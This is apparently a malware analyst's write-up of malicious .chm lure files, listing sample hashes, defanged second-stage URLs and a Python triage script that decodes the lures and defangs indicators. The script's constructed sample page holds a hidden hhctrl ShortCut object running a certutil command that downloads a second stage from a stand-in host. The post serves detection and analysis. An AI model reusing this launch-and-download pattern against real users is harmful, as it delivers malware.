I was bored and found this file with an interesting filename, “22 European Nations Form New .chm”
sha256 : ebec8440590cdea8433079cf2b3f3259694035a9ab80a163f1f0ffcf606939dc
ITW Filename : 22 European Nations Form New .chm
sha256 : c9b26ffb11ba2952afaa3e6a96a7089820366eaaa901240f60b8ca6ccd78beef
ITW Filename : mynakedpic.chm
Alright, it's slightly obfuscated, but we can clean this up.
We can see that it’s downloading the 2nd stage from “hxxp://png[.]realtimenews[.]tk/fssct.jpg”
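As an added example (this is my own triage helper, not code from the original post or from the samples), here is the kind of script that gets a CHM lure like this one to the second-stage URL quickly. A .chm is an ITSS container, so it is extracted first (7-Zip, e.g. `7z x sample.chm -ochm_out`, is assumed to be installed), and the script then runs over the HTML pages inside. It undoes the light obfuscation these lures normally use (String.fromCharCode, unescape('%3C...'), HTML entities), reports any HTML Help ActiveX (hhctrl.ocx) "ShortCut" object, which is the standard way a CHM launches a command, and defangs the URLs it finds in the same hxxp/[.] style used above. The hhctrl.ocx CLSID is the real one; the sample page, the host png.example.invalid and the file names in it are constructed for the demo and are not taken from the samples discussed here.

```python
"""Triage of HTML pages pulled out of a malicious .chm (example code, not from the original post).

Extract the container first (e.g. `7z x sample.chm -ochm_out`, assumed available) and point
triage_dir() at the output directory. The embedded SAMPLE_HTML is constructed for the demo.
"""
import pathlib
import re
from html import unescape as html_unescape
from urllib.parse import unquote

# CLSID of the HTML Help ActiveX control (hhctrl.ocx); its "ShortCut" command runs a program.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
OBJECT_RE = re.compile(r"<object[^>]*clsid:([0-9a-f-]+)[^>]*>(.*?)</object>", re.I | re.S)
PARAM_RE = re.compile(r"""<param\s+name=["']?(\w+)["']?\s+value=["']([^"']*)["']""", re.I)


def deobfuscate(html: str) -> str:
    """Undo the light obfuscation these lures use: String.fromCharCode(), unescape('%3C..'), entities."""
    html = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), html)
    return html_unescape(unquote(html))


def defang(url: str) -> str:
    """hxxp://host[.]tld/path: dots replaced in the host only, matching the writeup's IOC style."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.lower().replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def triage(html: str) -> dict:
    """Return defanged URLs, hhctrl ShortCut launches and whether a .Click() trigger is present."""
    decoded = deobfuscate(html)
    result = {"urls": sorted({defang(u) for u in URL_RE.findall(decoded)}),
              "shortcuts": [], "click_trigger": ".Click()" in decoded}
    for clsid, body in OBJECT_RE.findall(decoded):
        if clsid.lower() != HHCTRL_CLSID:
            continue
        params = {k.lower(): v for k, v in PARAM_RE.findall(body)}
        if params.get("command", "").lower() != "shortcut":
            continue
        # Item1 is "<window>,<program>,<arguments>"
        _window, program, args = (params.get("item1", "").split(",", 2) + ["", ""])[:3]
        result["shortcuts"].append({"program": program, "args": args})
    return result


def triage_dir(extracted: pathlib.Path) -> dict:
    """Run triage() over every .htm/.html page below an extracted CHM directory."""
    return {str(p.relative_to(extracted)): triage(p.read_text(errors="replace"))
            for p in sorted(extracted.rglob("*.htm*"))}


# Constructed lure page: unescape()-wrapped hhctrl ShortCut object plus a fromCharCode'd trigger.
SAMPLE_HTML = r"""<html><body><script>
document.write(unescape('%3Cobject id=%22x%22 classid=%22clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11%22 width=1 height=1%3E'
  + '%3Cparam name=%22Command%22 value=%22ShortCut%22%3E'
  + '%3Cparam name=%22Item1%22 value=%22,cmd.exe,/c certutil -urlcache -split -f http://png.example.invalid/stage2.jpg %25TEMP%25\s.jpg%22%3E'
  + '%3C/object%3E'));
document.write(String.fromCharCode(60,115,99,114,105,112,116,62,120,46,67,108,105,99,107,40,41,60,47,115,99,114,105,112,116,62));
</script></body></html>"""


if __name__ == "__main__":
    import json
    import sys
    target = pathlib.Path(sys.argv[1]) if len(sys.argv) > 1 else None
    print(json.dumps(triage_dir(target) if target else triage(SAMPLE_HTML), indent=2))
```

Run it with no arguments to see the constructed sample decoded, or pass the directory 7-Zip extracted the .chm into. The regexes are deliberately loose (unquoted attribute values, mixed case, objects split across `document.write` string fragments) because these lures are hand-edited HTML, not something a strict parser copes with well.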
The SHA256 of “fssct.png” is 61fa14c91f3014baa8ab09056633d1f9311184564ed49e30aba5203ea3071f25
The contents of that file are here: https://ghostbin.com/paste/t79kd
For those who are too lazy to decode it, I have decoded it for you and put it up on https://ghostbin.com/paste/cdkjf
As you can see, it's downloading from “hxxp://png[.]realtimenews[.]tk/fs.png”
The SHA256 of “fs.png” is “e95cb15d040e95fef37d8c2cec2ccca5914a116784c4d45ebfb94775fcb9a522”
I have extracted the payload and the hash of the payload is as follows.
SHA256 : fb18b8cc28da930ac06cd7494a4e5f69b91da6669586408293ac842dded8d557
We can also see that it's downloading another JSON file from “hxxp://news[.]realnewstime[.]xyz/news/us”
The SHA256 of the JSON file is “210dcb3a084179f7489a43000c04082b7d2c8606c077d44a9d912dbc530d542e”
Within this zip file, there is another malicious chm file.
sha256 : 413ec374a29f8595e2c90d1549968e3d71db0132b5bfa89b4bb301b132216435
ITW Filename : Wood Group in deal to take over Amec Foster Wheeler – News.chm
The payload will need a writeup of its own.
We can find other similar samples that use the same “Load_HTML_CHM0.html”:
sha256 : b1d141ed7fcd1051aa756c8ae0658c5c570f64b48c934d4fad246f3eb5ebcf3f
ITW Filename : Bigger Blocks and Smarter Contracts: What's In Bitcoin Cash's Next Fork?.chm
sha256 : 37f2ef8e7cba1523eda0e87d607217100543018cb1ba514974b69244783a3423
ITW Filename : Cloud Giant.chm
sha256 : 1c7075d8c86557ee1d1bee0acd5562370e350ad9b3f1081e2529cfcced0f9593
ITW Filename : 5 More Payments Firms to Adopt Ripple's xVia Tech.chm